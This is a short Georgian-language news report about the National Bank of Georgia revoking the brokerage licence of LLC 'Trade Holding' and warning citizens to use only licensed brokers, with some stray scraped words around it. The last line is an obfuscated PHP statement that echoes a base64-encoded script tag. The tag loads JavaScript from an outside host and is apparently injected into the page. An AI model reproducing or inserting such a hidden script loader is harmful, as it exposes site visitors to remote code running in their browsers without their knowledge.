celsiusi
ავერსი საქკაბელი

 საქართველოს ეროვნული ბანკის ვიცე-პრეზიდენტის განკარგულებით, შპს „თრეიდ ჰოლდინგს“ საბროკერო საქმიანობის ლიცენზია გაუუქმდა.

სებ-ის განცხადებით, გადაწყვეტილების მთავარი მიზეზი კომპანიის მხრიდან ფასიანი ქაღალდების ბაზრის კანონმდებლობით გათვალისწინებული ვალდებულებების არაჯეროვნად შესრულებაა.

„საბროკერო კომპანიის ლიცენზიის გაუქმებით, შპს „თრეიდ ჰოლდინგს“ აღარ აქვს უფლება განახორციელოს კანონმდებლობით გათვალისწინებული საბროკერო საქმიანობა, რომელიც განსაზღვრულია „ფასიანი ქაღალდების ბაზრის შესახებ“ საქართველოს კანონის 23-ე მუხლით.

ნებისმიერი ზემოხსენებული მომსახურების განხორციელება (რა სახელწოდებასაც არ უნდა ატარებდეს იგი), შესაბამისი ლიცენზიის გარეშე და კანონმდებლობის გვერდის ავლით, წარმოადგენს დანაშაულებრივ ქმედებას და განსაკუთრებით მაღალი რისკის შემცველია როგორც კლიენტებისთვის, ასევე ფასიანი ქაღალდების ბაზრისა და მთლიანად საფინანსო სექტორისთვის“, - აცხადებენ სებ-ში.

საქართველოს ეროვნული ბანკი მოუწოდებს მოქალაქეებს, განსაკუთრებული სიფრთხილე გამოიჩინონ მსგავს კომპანიებთან და ისარგებლონ მხოლოდ ეროვნული ბანკის მიერ ლიცენზირებული საბროკერო კომპანიების მომსახურებებით.

293
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");